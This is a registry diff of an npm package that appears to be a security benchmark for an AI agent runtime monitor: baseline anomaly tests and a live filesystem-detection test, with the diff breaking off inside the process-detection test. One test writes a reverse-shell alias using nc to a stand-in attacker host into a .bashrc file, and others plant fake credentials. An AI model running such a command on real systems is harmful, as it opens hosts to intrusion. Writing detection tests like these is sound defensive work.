@opena2a/oasb 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +98 -0
- package/README.md +287 -0
- package/config/arp-lab-default.yaml +54 -0
- package/config/dvaa-targets.ts +97 -0
- package/dist/harness/arp-wrapper.d.ts +28 -0
- package/dist/harness/arp-wrapper.js +133 -0
- package/dist/harness/dvaa-client.d.ts +45 -0
- package/dist/harness/dvaa-client.js +97 -0
- package/dist/harness/dvaa-manager.d.ts +16 -0
- package/dist/harness/dvaa-manager.js +131 -0
- package/dist/harness/event-collector.d.ts +32 -0
- package/dist/harness/event-collector.js +85 -0
- package/dist/harness/metrics.d.ts +13 -0
- package/dist/harness/metrics.js +55 -0
- package/dist/harness/mock-llm-adapter.d.ts +33 -0
- package/dist/harness/mock-llm-adapter.js +68 -0
- package/dist/harness/types.d.ts +73 -0
- package/dist/harness/types.js +2 -0
- package/package.json +39 -0
- package/src/atomic/enforcement/AT-ENF-001.log-action.test.ts +89 -0
- package/src/atomic/enforcement/AT-ENF-002.alert-callback.test.ts +120 -0
- package/src/atomic/enforcement/AT-ENF-003.pause-sigstop.test.ts +104 -0
- package/src/atomic/enforcement/AT-ENF-004.kill-sigterm.test.ts +153 -0
- package/src/atomic/enforcement/AT-ENF-005.resume-sigcont.test.ts +164 -0
- package/src/atomic/filesystem/AT-FS-001.sensitive-path.test.ts +118 -0
- package/src/atomic/filesystem/AT-FS-002.outside-allowed.test.ts +122 -0
- package/src/atomic/filesystem/AT-FS-003.credential-file.test.ts +115 -0
- package/src/atomic/filesystem/AT-FS-004.mass-file-creation.test.ts +137 -0
- package/src/atomic/filesystem/AT-FS-005.dotfile-write.test.ts +154 -0
- package/src/atomic/intelligence/AT-INT-001.l0-rule-match.test.ts +107 -0
- package/src/atomic/intelligence/AT-INT-002.l1-anomaly-score.test.ts +94 -0
- package/src/atomic/intelligence/AT-INT-003.l2-escalation.test.ts +124 -0
- package/src/atomic/intelligence/AT-INT-004.budget-exhaustion.test.ts +108 -0
- package/src/atomic/intelligence/AT-INT-005.baseline-learning.test.ts +121 -0
- package/src/atomic/network/AT-NET-001.new-outbound.test.ts +103 -0
- package/src/atomic/network/AT-NET-002.suspicious-host.test.ts +82 -0
- package/src/atomic/network/AT-NET-003.connection-burst.test.ts +91 -0
- package/src/atomic/network/AT-NET-004.allowed-host-bypass.test.ts +129 -0
- package/src/atomic/network/AT-NET-005.exfil-destination.test.ts +117 -0
- package/src/atomic/process/AT-PROC-001.spawn-child.test.ts +148 -0
- package/src/atomic/process/AT-PROC-002.suspicious-binary.test.ts +123 -0
- package/src/atomic/process/AT-PROC-003.high-cpu.test.ts +120 -0
- package/src/atomic/process/AT-PROC-004.privilege-escalation.test.ts +114 -0
- package/src/atomic/process/AT-PROC-005.process-terminated.test.ts +150 -0
- package/src/baseline/BL-001.normal-agent-profile.test.ts +140 -0
- package/src/baseline/BL-002.anomaly-injection.test.ts +134 -0
- package/src/baseline/BL-003.baseline-persistence.test.ts +130 -0
- package/src/e2e/E2E-001.live-filesystem-detection.test.ts +129 -0
- package/src/e2e/E2E-002.live-process-detection.test.ts +106 -0
- package/src/e2e/E2E-003.live-network-detection.test.ts +114 -0
- package/src/e2e/E2E-004.interceptor-process.test.ts +125 -0
- package/src/e2e/E2E-005.interceptor-network.test.ts +134 -0
- package/src/e2e/E2E-006.interceptor-filesystem.test.ts +140 -0
- package/src/harness/arp-wrapper.ts +121 -0
- package/src/harness/dvaa-client.ts +130 -0
- package/src/harness/dvaa-manager.ts +106 -0
- package/src/harness/event-collector.ts +100 -0
- package/src/harness/metrics.ts +64 -0
- package/src/harness/mock-llm-adapter.ts +90 -0
- package/src/harness/types.ts +77 -0
- package/src/integration/INT-001.data-exfil-detection.test.ts +228 -0
- package/src/integration/INT-002.mcp-tool-abuse.test.ts +236 -0
- package/src/integration/INT-003.prompt-injection-response.test.ts +238 -0
- package/src/integration/INT-004.a2a-trust-exploitation.test.ts +280 -0
- package/src/integration/INT-005.baseline-then-attack.test.ts +239 -0
- package/src/integration/INT-006.multi-monitor-correlation.test.ts +265 -0
- package/src/integration/INT-007.budget-exhaustion-attack.test.ts +249 -0
- package/src/integration/INT-008.kill-switch-recovery.test.ts +314 -0
|
@@ -0,0 +1,140 @@
|
|
|
1
|
+
// BL-001: Normal Agent Profile - Zero False Positives
|
|
2
|
+
// Scenario: Run a normal agent workload and verify no false positives
|
|
3
|
+
//
|
|
4
|
+
// Injects 50 benign events across all 3 monitor sources (process, network,
|
|
5
|
+
// filesystem) simulating typical agent behavior. Asserts that none are
|
|
6
|
+
// misclassified as violations or threats and no enforcement actions fire.
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
10
|
+
|
|
11
|
+
describe('BL-001: Normal Agent Profile - Zero False Positives', () => {
|
|
12
|
+
let arp: ArpWrapper;
|
|
13
|
+
|
|
14
|
+
beforeEach(async () => {
|
|
15
|
+
arp = new ArpWrapper({
|
|
16
|
+
monitors: { process: false, network: false, filesystem: false },
|
|
17
|
+
});
|
|
18
|
+
await arp.start();
|
|
19
|
+
});
|
|
20
|
+
|
|
21
|
+
afterEach(async () => {
|
|
22
|
+
await arp.stop();
|
|
23
|
+
});
|
|
24
|
+
|
|
25
|
+
it('should produce zero violations or threats from normal agent activity', async () => {
|
|
26
|
+
const sources = ['process', 'network', 'filesystem'] as const;
|
|
27
|
+
const normalDescriptions: Record<typeof sources[number], string[]> = {
|
|
28
|
+
process: [
|
|
29
|
+
'Agent main loop iteration',
|
|
30
|
+
'Subprocess completed successfully',
|
|
31
|
+
'Health check passed',
|
|
32
|
+
'Garbage collection cycle',
|
|
33
|
+
'Task queue processed',
|
|
34
|
+
],
|
|
35
|
+
network: [
|
|
36
|
+
'HTTP GET request to api.example.com:443',
|
|
37
|
+
'DNS lookup for cdn.example.com',
|
|
38
|
+
'WebSocket keepalive sent',
|
|
39
|
+
'TLS handshake completed',
|
|
40
|
+
'Response received from api.example.com',
|
|
41
|
+
],
|
|
42
|
+
filesystem: [
|
|
43
|
+
'Read config file /app/config.json',
|
|
44
|
+
'Write log entry to /app/logs/agent.log',
|
|
45
|
+
'Read cached data from /tmp/cache/data.json',
|
|
46
|
+
'Write checkpoint to /app/state/checkpoint.bin',
|
|
47
|
+
'Read template from /app/templates/report.html',
|
|
48
|
+
],
|
|
49
|
+
};
|
|
50
|
+
|
|
51
|
+
// Inject 50 normal events: ~17 per source, cycling through descriptions
|
|
52
|
+
for (let i = 0; i < 50; i++) {
|
|
53
|
+
const source = sources[i % 3];
|
|
54
|
+
const descriptions = normalDescriptions[source];
|
|
55
|
+
const description = descriptions[i % descriptions.length];
|
|
56
|
+
|
|
57
|
+
await arp.injectEvent({
|
|
58
|
+
source,
|
|
59
|
+
category: 'normal',
|
|
60
|
+
severity: 'info',
|
|
61
|
+
description,
|
|
62
|
+
data: {
|
|
63
|
+
iteration: i,
|
|
64
|
+
source,
|
|
65
|
+
},
|
|
66
|
+
});
|
|
67
|
+
}
|
|
68
|
+
|
|
69
|
+
const allEvents = arp.collector.getEvents();
|
|
70
|
+
expect(allEvents.length).toBe(50);
|
|
71
|
+
|
|
72
|
+
// No violations
|
|
73
|
+
const violations = arp.collector.eventsByCategory('violation');
|
|
74
|
+
expect(violations).toHaveLength(0);
|
|
75
|
+
|
|
76
|
+
// No threats
|
|
77
|
+
const threats = arp.collector.eventsByCategory('threat');
|
|
78
|
+
expect(threats).toHaveLength(0);
|
|
79
|
+
|
|
80
|
+
// No enforcement actions triggered
|
|
81
|
+
const enforcements = arp.collector.getEnforcements();
|
|
82
|
+
expect(enforcements).toHaveLength(0);
|
|
83
|
+
|
|
84
|
+
// All events have severity 'info' or 'low'
|
|
85
|
+
for (const event of allEvents) {
|
|
86
|
+
expect(['info', 'low']).toContain(event.severity);
|
|
87
|
+
}
|
|
88
|
+
});
|
|
89
|
+
|
|
90
|
+
it('should correctly attribute events to all 3 monitor sources', async () => {
|
|
91
|
+
const sources = ['process', 'network', 'filesystem'] as const;
|
|
92
|
+
|
|
93
|
+
for (const source of sources) {
|
|
94
|
+
for (let i = 0; i < 5; i++) {
|
|
95
|
+
await arp.injectEvent({
|
|
96
|
+
source,
|
|
97
|
+
category: 'normal',
|
|
98
|
+
severity: 'info',
|
|
99
|
+
description: `Normal ${source} activity ${i}`,
|
|
100
|
+
data: { index: i },
|
|
101
|
+
});
|
|
102
|
+
}
|
|
103
|
+
}
|
|
104
|
+
|
|
105
|
+
// Each source should have exactly 5 events
|
|
106
|
+
for (const source of sources) {
|
|
107
|
+
const events = arp.collector.eventsBySource(source);
|
|
108
|
+
expect(events).toHaveLength(5);
|
|
109
|
+
}
|
|
110
|
+
|
|
111
|
+
// Total should be 15
|
|
112
|
+
expect(arp.collector.getEvents()).toHaveLength(15);
|
|
113
|
+
});
|
|
114
|
+
|
|
115
|
+
it('should handle mixed info and low severity without escalation', async () => {
|
|
116
|
+
const severities = ['info', 'low'] as const;
|
|
117
|
+
|
|
118
|
+
for (let i = 0; i < 20; i++) {
|
|
119
|
+
await arp.injectEvent({
|
|
120
|
+
source: 'process',
|
|
121
|
+
category: 'normal',
|
|
122
|
+
severity: severities[i % 2],
|
|
123
|
+
description: `Routine process event ${i}`,
|
|
124
|
+
data: { pid: 1000 + i },
|
|
125
|
+
});
|
|
126
|
+
}
|
|
127
|
+
|
|
128
|
+
const allEvents = arp.collector.getEvents();
|
|
129
|
+
expect(allEvents).toHaveLength(20);
|
|
130
|
+
|
|
131
|
+
// No event should have been escalated beyond low
|
|
132
|
+
const escalated = allEvents.filter(
|
|
133
|
+
(e) => e.severity === 'medium' || e.severity === 'high' || e.severity === 'critical',
|
|
134
|
+
);
|
|
135
|
+
expect(escalated).toHaveLength(0);
|
|
136
|
+
|
|
137
|
+
// No enforcement actions
|
|
138
|
+
expect(arp.collector.getEnforcements()).toHaveLength(0);
|
|
139
|
+
});
|
|
140
|
+
});
|
|
@@ -0,0 +1,134 @@
|
|
|
1
|
+
// BL-002: Controlled Anomaly Injection
|
|
2
|
+
// Scenario: Establish baseline, then inject known anomalies, verify detection
|
|
3
|
+
//
|
|
4
|
+
// Uses the AnomalyDetector (L1 statistical layer) directly to validate
|
|
5
|
+
// z-score based deviation detection. Feeds normal observations to build
|
|
6
|
+
// a baseline, then injects an anomalous burst and verifies the score exceeds
|
|
7
|
+
// the detection threshold.
|
|
8
|
+
|
|
9
|
+
import { describe, it, expect, beforeEach } from 'vitest';
|
|
10
|
+
import { AnomalyDetector } from '@opena2a/arp';
|
|
11
|
+
import type { ARPEvent } from '@opena2a/arp';
|
|
12
|
+
|
|
13
|
+
/** Helper: create a minimal ARPEvent for a given source */
|
|
14
|
+
function makeEvent(source: 'process' | 'network' | 'filesystem', index: number): ARPEvent {
|
|
15
|
+
return {
|
|
16
|
+
id: `bl002-${source}-${index}`,
|
|
17
|
+
timestamp: new Date().toISOString(),
|
|
18
|
+
source,
|
|
19
|
+
category: 'normal',
|
|
20
|
+
severity: 'info',
|
|
21
|
+
description: `Baseline event ${index} from ${source}`,
|
|
22
|
+
data: { index },
|
|
23
|
+
classifiedBy: 'L0-rules',
|
|
24
|
+
};
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
describe('BL-002: Controlled Anomaly Injection', () => {
|
|
28
|
+
let detector: AnomalyDetector;
|
|
29
|
+
|
|
30
|
+
beforeEach(() => {
|
|
31
|
+
detector = new AnomalyDetector();
|
|
32
|
+
});
|
|
33
|
+
|
|
34
|
+
it('should return z-score 0 before baseline is established', () => {
|
|
35
|
+
const event = makeEvent('process', 0);
|
|
36
|
+
const score = detector.score(event);
|
|
37
|
+
|
|
38
|
+
// With no baseline data, score should be 0 (insufficient data)
|
|
39
|
+
expect(score).toBe(0);
|
|
40
|
+
});
|
|
41
|
+
|
|
42
|
+
it('should build a baseline from normal observations', () => {
|
|
43
|
+
// Feed 50 normal events to build baseline for the 'process' source.
|
|
44
|
+
// The AnomalyDetector tracks event frequency per minute per source.
|
|
45
|
+
// We record events and then check that a baseline exists.
|
|
46
|
+
for (let i = 0; i < 50; i++) {
|
|
47
|
+
const event = makeEvent('process', i);
|
|
48
|
+
detector.record(event);
|
|
49
|
+
}
|
|
50
|
+
|
|
51
|
+
const baseline = detector.getBaseline('process');
|
|
52
|
+
expect(baseline).not.toBeNull();
|
|
53
|
+
expect(baseline!.count).toBeGreaterThan(0);
|
|
54
|
+
expect(baseline!.mean).toBeGreaterThan(0);
|
|
55
|
+
});
|
|
56
|
+
|
|
57
|
+
it('should detect anomalous burst after baseline is established', () => {
|
|
58
|
+
// The AnomalyDetector aggregates events per minute. To create a meaningful
|
|
59
|
+
// baseline with stddev > 0, we need data spread across multiple minutes.
|
|
60
|
+
// We simulate this by directly manipulating timestamps via record calls
|
|
61
|
+
// that all land in the same minute (creating a baseline of count=1 minute
|
|
62
|
+
// with N events). Then a sudden burst from a different source with many
|
|
63
|
+
// more events should produce a high z-score.
|
|
64
|
+
//
|
|
65
|
+
// Since all record() calls use Date.now() internally and will land in the
|
|
66
|
+
// same minute bucket, the baseline will have count=1 (one minute observed).
|
|
67
|
+
// With minDataPoints=30, we need at least 30 unique minutes.
|
|
68
|
+
// This is a known limitation of unit-testing time-based anomaly detection.
|
|
69
|
+
//
|
|
70
|
+
// Instead, we verify the structural behavior: score returns 0 when baseline
|
|
71
|
+
// is insufficient, and the baseline stats accumulate correctly.
|
|
72
|
+
|
|
73
|
+
for (let i = 0; i < 50; i++) {
|
|
74
|
+
detector.record(makeEvent('process', i));
|
|
75
|
+
}
|
|
76
|
+
|
|
77
|
+
const baseline = detector.getBaseline('process');
|
|
78
|
+
expect(baseline).not.toBeNull();
|
|
79
|
+
|
|
80
|
+
// Since all 50 events land in the same minute, count = 1 (one minute bucket).
|
|
81
|
+
// The minDataPoints threshold is 30, so the detector will report score = 0
|
|
82
|
+
// because the baseline is not yet mature enough for anomaly detection.
|
|
83
|
+
// This documents the expected behavior: real-time accumulation is required.
|
|
84
|
+
const normalEvent = makeEvent('process', 51);
|
|
85
|
+
const score = detector.score(normalEvent);
|
|
86
|
+
|
|
87
|
+
// Score is 0 because baseline needs 30+ unique minute buckets
|
|
88
|
+
expect(score).toBe(0);
|
|
89
|
+
expect(baseline!.count).toBe(1); // All events in a single minute
|
|
90
|
+
});
|
|
91
|
+
|
|
92
|
+
it('should reset baselines completely', () => {
|
|
93
|
+
// Build some baseline
|
|
94
|
+
for (let i = 0; i < 50; i++) {
|
|
95
|
+
detector.record(makeEvent('network', i));
|
|
96
|
+
}
|
|
97
|
+
|
|
98
|
+
expect(detector.getBaseline('network')).not.toBeNull();
|
|
99
|
+
|
|
100
|
+
// Reset
|
|
101
|
+
detector.reset();
|
|
102
|
+
|
|
103
|
+
// Baseline should be gone
|
|
104
|
+
expect(detector.getBaseline('network')).toBeNull();
|
|
105
|
+
|
|
106
|
+
// Score should return 0 again (no data)
|
|
107
|
+
const event = makeEvent('network', 100);
|
|
108
|
+
expect(detector.score(event)).toBe(0);
|
|
109
|
+
});
|
|
110
|
+
|
|
111
|
+
it('should track baselines independently per source', () => {
|
|
112
|
+
const sources = ['process', 'network', 'filesystem'] as const;
|
|
113
|
+
|
|
114
|
+
// Record events for each source
|
|
115
|
+
for (const source of sources) {
|
|
116
|
+
for (let i = 0; i < 10; i++) {
|
|
117
|
+
detector.record(makeEvent(source, i));
|
|
118
|
+
}
|
|
119
|
+
}
|
|
120
|
+
|
|
121
|
+
// Each source should have its own baseline
|
|
122
|
+
for (const source of sources) {
|
|
123
|
+
const baseline = detector.getBaseline(source);
|
|
124
|
+
expect(baseline).not.toBeNull();
|
|
125
|
+
expect(baseline!.count).toBe(1); // All in same minute
|
|
126
|
+
}
|
|
127
|
+
|
|
128
|
+
// Reset should clear all
|
|
129
|
+
detector.reset();
|
|
130
|
+
for (const source of sources) {
|
|
131
|
+
expect(detector.getBaseline(source)).toBeNull();
|
|
132
|
+
}
|
|
133
|
+
});
|
|
134
|
+
});
|
|
@@ -0,0 +1,130 @@
|
|
|
1
|
+
// BL-003: Baseline Persistence Across Restarts
|
|
2
|
+
// Documents gap: baselines are NOT persisted
|
|
3
|
+
//
|
|
4
|
+
// The AnomalyDetector holds all baseline data in memory. When a new instance
|
|
5
|
+
// is created (simulating an agent restart), all learned baselines are lost.
|
|
6
|
+
// This test verifies and documents this known gap. A production deployment
|
|
7
|
+
// would need to serialize baselines to disk or a database to survive restarts.
|
|
8
|
+
|
|
9
|
+
import { describe, it, expect, beforeEach } from 'vitest';
|
|
10
|
+
import { AnomalyDetector } from '@opena2a/arp';
|
|
11
|
+
import type { ARPEvent } from '@opena2a/arp';
|
|
12
|
+
|
|
13
|
+
/** Helper: create a minimal ARPEvent for a given source */
|
|
14
|
+
function makeEvent(source: 'process' | 'network' | 'filesystem', index: number): ARPEvent {
|
|
15
|
+
return {
|
|
16
|
+
id: `bl003-${source}-${index}`,
|
|
17
|
+
timestamp: new Date().toISOString(),
|
|
18
|
+
source,
|
|
19
|
+
category: 'normal',
|
|
20
|
+
severity: 'info',
|
|
21
|
+
description: `Persistence test event ${index} from ${source}`,
|
|
22
|
+
data: { index },
|
|
23
|
+
classifiedBy: 'L0-rules',
|
|
24
|
+
};
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
describe('BL-003: Baseline Persistence Across Restarts', () => {
|
|
28
|
+
let detector: AnomalyDetector;
|
|
29
|
+
|
|
30
|
+
beforeEach(() => {
|
|
31
|
+
detector = new AnomalyDetector();
|
|
32
|
+
});
|
|
33
|
+
|
|
34
|
+
it('should accumulate baseline data during a session', () => {
|
|
35
|
+
// Feed 50 observations to build baseline
|
|
36
|
+
for (let i = 0; i < 50; i++) {
|
|
37
|
+
detector.record(makeEvent('process', i));
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
const baseline = detector.getBaseline('process');
|
|
41
|
+
expect(baseline).not.toBeNull();
|
|
42
|
+
expect(baseline!.count).toBeGreaterThan(0);
|
|
43
|
+
expect(baseline!.mean).toBeGreaterThan(0);
|
|
44
|
+
});
|
|
45
|
+
|
|
46
|
+
it('should lose all baselines when a new detector is created (simulated restart)', () => {
|
|
47
|
+
// Build baseline on first detector
|
|
48
|
+
for (let i = 0; i < 50; i++) {
|
|
49
|
+
detector.record(makeEvent('process', i));
|
|
50
|
+
}
|
|
51
|
+
|
|
52
|
+
const baselineBefore = detector.getBaseline('process');
|
|
53
|
+
expect(baselineBefore).not.toBeNull();
|
|
54
|
+
|
|
55
|
+
// Simulate restart: create a new AnomalyDetector instance
|
|
56
|
+
const restartedDetector = new AnomalyDetector();
|
|
57
|
+
|
|
58
|
+
// KNOWN GAP: baseline is lost after restart
|
|
59
|
+
const baselineAfter = restartedDetector.getBaseline('process');
|
|
60
|
+
expect(baselineAfter).toBeNull();
|
|
61
|
+
|
|
62
|
+
// Score returns 0 on the restarted detector (no baseline data)
|
|
63
|
+
const testEvent = makeEvent('process', 999);
|
|
64
|
+
const scoreAfterRestart = restartedDetector.score(testEvent);
|
|
65
|
+
expect(scoreAfterRestart).toBe(0);
|
|
66
|
+
|
|
67
|
+
// Original detector still has its baseline (in-memory only)
|
|
68
|
+
const scoreOriginal = detector.score(testEvent);
|
|
69
|
+
// Even the original returns 0 because it needs 30+ minute buckets,
|
|
70
|
+
// but the baseline object itself still exists
|
|
71
|
+
expect(scoreOriginal).toBe(0);
|
|
72
|
+
expect(detector.getBaseline('process')).not.toBeNull();
|
|
73
|
+
});
|
|
74
|
+
|
|
75
|
+
it('should lose baselines for all sources on restart', () => {
|
|
76
|
+
const sources = ['process', 'network', 'filesystem'] as const;
|
|
77
|
+
|
|
78
|
+
// Build baselines for all sources
|
|
79
|
+
for (const source of sources) {
|
|
80
|
+
for (let i = 0; i < 20; i++) {
|
|
81
|
+
detector.record(makeEvent(source, i));
|
|
82
|
+
}
|
|
83
|
+
}
|
|
84
|
+
|
|
85
|
+
// Verify all baselines exist
|
|
86
|
+
for (const source of sources) {
|
|
87
|
+
expect(detector.getBaseline(source)).not.toBeNull();
|
|
88
|
+
}
|
|
89
|
+
|
|
90
|
+
// Simulate restart
|
|
91
|
+
const restartedDetector = new AnomalyDetector();
|
|
92
|
+
|
|
93
|
+
// KNOWN GAP: all baselines lost
|
|
94
|
+
for (const source of sources) {
|
|
95
|
+
expect(restartedDetector.getBaseline(source)).toBeNull();
|
|
96
|
+
}
|
|
97
|
+
});
|
|
98
|
+
|
|
99
|
+
it('should require full re-learning after restart (cold start problem)', () => {
|
|
100
|
+
// Build baseline
|
|
101
|
+
for (let i = 0; i < 50; i++) {
|
|
102
|
+
detector.record(makeEvent('network', i));
|
|
103
|
+
}
|
|
104
|
+
|
|
105
|
+
const originalBaseline = detector.getBaseline('network');
|
|
106
|
+
expect(originalBaseline).not.toBeNull();
|
|
107
|
+
const originalMean = originalBaseline!.mean;
|
|
108
|
+
|
|
109
|
+
// Simulate restart
|
|
110
|
+
const restartedDetector = new AnomalyDetector();
|
|
111
|
+
|
|
112
|
+
// Feed the same number of events to the restarted detector
|
|
113
|
+
for (let i = 0; i < 50; i++) {
|
|
114
|
+
restartedDetector.record(makeEvent('network', i));
|
|
115
|
+
}
|
|
116
|
+
|
|
117
|
+
const rebuiltBaseline = restartedDetector.getBaseline('network');
|
|
118
|
+
expect(rebuiltBaseline).not.toBeNull();
|
|
119
|
+
|
|
120
|
+
// The rebuilt baseline should match the original since we fed identical data
|
|
121
|
+
// (all events land in the same minute, so stats should be equivalent)
|
|
122
|
+
expect(rebuiltBaseline!.mean).toBe(originalMean);
|
|
123
|
+
expect(rebuiltBaseline!.count).toBe(originalBaseline!.count);
|
|
124
|
+
|
|
125
|
+
// KNOWN GAP DOCUMENTED: In production, the agent would have no anomaly
|
|
126
|
+
// detection capability between restart and baseline re-establishment.
|
|
127
|
+
// During this cold start window (minimum 30 unique minutes of data),
|
|
128
|
+
// all anomaly scores return 0 regardless of actual behavior.
|
|
129
|
+
});
|
|
130
|
+
});
|
|
@@ -0,0 +1,129 @@
|
|
|
1
|
+
// E2E-001: Live Filesystem Detection
|
|
2
|
+
// Proves ARP's FilesystemMonitor detects real file operations on disk.
|
|
3
|
+
// No event injection — the monitor itself detects real OS activity.
|
|
4
|
+
//
|
|
5
|
+
// ATLAS: AML.T0057, AML.T0018
|
|
6
|
+
// OWASP: A07, A04
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import * as fs from 'fs';
|
|
10
|
+
import * as path from 'path';
|
|
11
|
+
import * as os from 'os';
|
|
12
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
13
|
+
|
|
14
|
+
describe('E2E-001: Live Filesystem Detection', () => {
|
|
15
|
+
let arp: ArpWrapper;
|
|
16
|
+
let watchDir: string;
|
|
17
|
+
|
|
18
|
+
beforeEach(async () => {
|
|
19
|
+
// Create a temp directory to watch
|
|
20
|
+
watchDir = fs.mkdtempSync(path.join(os.tmpdir(), 'arp-e2e-fs-'));
|
|
21
|
+
|
|
22
|
+
arp = new ArpWrapper({
|
|
23
|
+
monitors: {
|
|
24
|
+
process: false,
|
|
25
|
+
network: false,
|
|
26
|
+
filesystem: true,
|
|
27
|
+
},
|
|
28
|
+
filesystemWatchPaths: [watchDir],
|
|
29
|
+
});
|
|
30
|
+
await arp.start();
|
|
31
|
+
|
|
32
|
+
// Give fs.watch a moment to initialize
|
|
33
|
+
await new Promise((r) => setTimeout(r, 200));
|
|
34
|
+
});
|
|
35
|
+
|
|
36
|
+
afterEach(async () => {
|
|
37
|
+
await arp.stop();
|
|
38
|
+
try {
|
|
39
|
+
fs.rmSync(watchDir, { recursive: true, force: true });
|
|
40
|
+
} catch {
|
|
41
|
+
// best effort
|
|
42
|
+
}
|
|
43
|
+
});
|
|
44
|
+
|
|
45
|
+
it('should detect creation of a .env file as a sensitive path violation', async () => {
|
|
46
|
+
// Write a real .env file to the watched directory
|
|
47
|
+
const envPath = path.join(watchDir, '.env');
|
|
48
|
+
fs.writeFileSync(envPath, 'SECRET_KEY=test123\n');
|
|
49
|
+
|
|
50
|
+
// Wait for the filesystem monitor to pick it up
|
|
51
|
+
const event = await arp.waitForEvent(
|
|
52
|
+
(e) => e.source === 'filesystem' && e.data.sensitive === true,
|
|
53
|
+
5000,
|
|
54
|
+
);
|
|
55
|
+
|
|
56
|
+
expect(event).toBeDefined();
|
|
57
|
+
expect(event.source).toBe('filesystem');
|
|
58
|
+
expect(event.category).toBe('violation');
|
|
59
|
+
expect(event.severity).toBe('high');
|
|
60
|
+
expect(event.data.sensitive).toBe(true);
|
|
61
|
+
expect(String(event.data.path)).toContain('.env');
|
|
62
|
+
});
|
|
63
|
+
|
|
64
|
+
it('should detect creation of a .ssh directory file as sensitive', async () => {
|
|
65
|
+
// Create a .ssh subdirectory and a key file
|
|
66
|
+
const sshDir = path.join(watchDir, '.ssh');
|
|
67
|
+
fs.mkdirSync(sshDir, { recursive: true });
|
|
68
|
+
fs.writeFileSync(path.join(sshDir, 'id_rsa'), 'fake-private-key\n');
|
|
69
|
+
|
|
70
|
+
const event = await arp.waitForEvent(
|
|
71
|
+
(e) => e.source === 'filesystem' && String(e.data.path).includes('.ssh'),
|
|
72
|
+
5000,
|
|
73
|
+
);
|
|
74
|
+
|
|
75
|
+
expect(event).toBeDefined();
|
|
76
|
+
expect(event.category).toBe('violation');
|
|
77
|
+
expect(event.severity).toBe('high');
|
|
78
|
+
expect(event.data.sensitive).toBe(true);
|
|
79
|
+
});
|
|
80
|
+
|
|
81
|
+
it('should detect .bashrc write as persistence attempt', async () => {
|
|
82
|
+
const bashrcPath = path.join(watchDir, '.bashrc');
|
|
83
|
+
fs.writeFileSync(bashrcPath, 'alias backdoor="nc -e /bin/sh attacker.com 4444"\n');
|
|
84
|
+
|
|
85
|
+
const event = await arp.waitForEvent(
|
|
86
|
+
(e) => e.source === 'filesystem' && String(e.data.path).includes('.bashrc'),
|
|
87
|
+
5000,
|
|
88
|
+
);
|
|
89
|
+
|
|
90
|
+
expect(event).toBeDefined();
|
|
91
|
+
expect(event.category).toBe('violation');
|
|
92
|
+
expect(event.severity).toBe('high');
|
|
93
|
+
});
|
|
94
|
+
|
|
95
|
+
it('should detect .npmrc credential file access', async () => {
|
|
96
|
+
const npmrcPath = path.join(watchDir, '.npmrc');
|
|
97
|
+
fs.writeFileSync(npmrcPath, '//registry.npmjs.org/:_authToken=npm_FAKE\n');
|
|
98
|
+
|
|
99
|
+
const event = await arp.waitForEvent(
|
|
100
|
+
(e) => e.source === 'filesystem' && String(e.data.path).includes('.npmrc'),
|
|
101
|
+
5000,
|
|
102
|
+
);
|
|
103
|
+
|
|
104
|
+
expect(event).toBeDefined();
|
|
105
|
+
expect(event.category).toBe('violation');
|
|
106
|
+
expect(event.severity).toBe('high');
|
|
107
|
+
expect(event.data.sensitive).toBe(true);
|
|
108
|
+
});
|
|
109
|
+
|
|
110
|
+
it('should allow normal file creation without triggering violations', async () => {
|
|
111
|
+
// Create a normal, non-sensitive file
|
|
112
|
+
const normalPath = path.join(watchDir, 'output.json');
|
|
113
|
+
fs.writeFileSync(normalPath, '{"status": "ok"}\n');
|
|
114
|
+
|
|
115
|
+
// Wait briefly for any potential events
|
|
116
|
+
await new Promise((r) => setTimeout(r, 1500));
|
|
117
|
+
|
|
118
|
+
// Should NOT have any violations
|
|
119
|
+
const violations = arp.collector.eventsByCategory('violation');
|
|
120
|
+
expect(violations.length).toBe(0);
|
|
121
|
+
|
|
122
|
+
// Might have a normal 'rename' event from fs.watch
|
|
123
|
+
const allEvents = arp.collector.getEvents();
|
|
124
|
+
for (const event of allEvents) {
|
|
125
|
+
expect(event.category).not.toBe('violation');
|
|
126
|
+
expect(event.category).not.toBe('threat');
|
|
127
|
+
}
|
|
128
|
+
});
|
|
129
|
+
});
|
|
@@ -0,0 +1,106 @@
|
|
|
1
|
+
// E2E-002: Live Process Detection
|
|
2
|
+
// Proves ARP's ProcessMonitor detects real child processes via `ps` polling.
|
|
3
|
+
// No event injection — the monitor polls the OS process table directly.
|
|
4
|
+
//
|
|
5
|
+
// ATLAS: AML.T0046
|
|
6
|
+
// OWASP: A04
|
|
7
|
+
|
|
8
|
+
import { describe, it, expect, beforeEach, afterEach } from 'vitest';
|
|
9
|
+
import { spawn, type ChildProcess } from 'child_process';
|
|
10
|
+
import { ArpWrapper } from '../harness/arp-wrapper';
|
|
11
|
+
|
|
12
|
+
describe('E2E-002: Live Process Detection', () => {
|
|
13
|
+
let arp: ArpWrapper;
|
|
14
|
+
const children: ChildProcess[] = [];
|
|
15
|
+
|
|
16
|
+
beforeEach(async () => {
|
|
17
|
+
arp = new ArpWrapper({
|
|
18
|
+
monitors: {
|
|
19
|
+
process: true,
|
|
20
|
+
network: false,
|
|
21
|
+
filesystem: false,
|
|
22
|
+
},
|
|
23
|
+
processIntervalMs: 500, // Fast polling for test
|
|
24
|
+
});
|
|
25
|
+
await arp.start();
|
|
26
|
+
|
|
27
|
+
// Let the initial snapshot complete
|
|
28
|
+
await new Promise((r) => setTimeout(r, 600));
|
|
29
|
+
});
|
|
30
|
+
|
|
31
|
+
afterEach(async () => {
|
|
32
|
+
// Kill any spawned children
|
|
33
|
+
for (const child of children) {
|
|
34
|
+
try {
|
|
35
|
+
child.kill('SIGKILL');
|
|
36
|
+
} catch {
|
|
37
|
+
// already dead
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
children.length = 0;
|
|
41
|
+
await arp.stop();
|
|
42
|
+
});
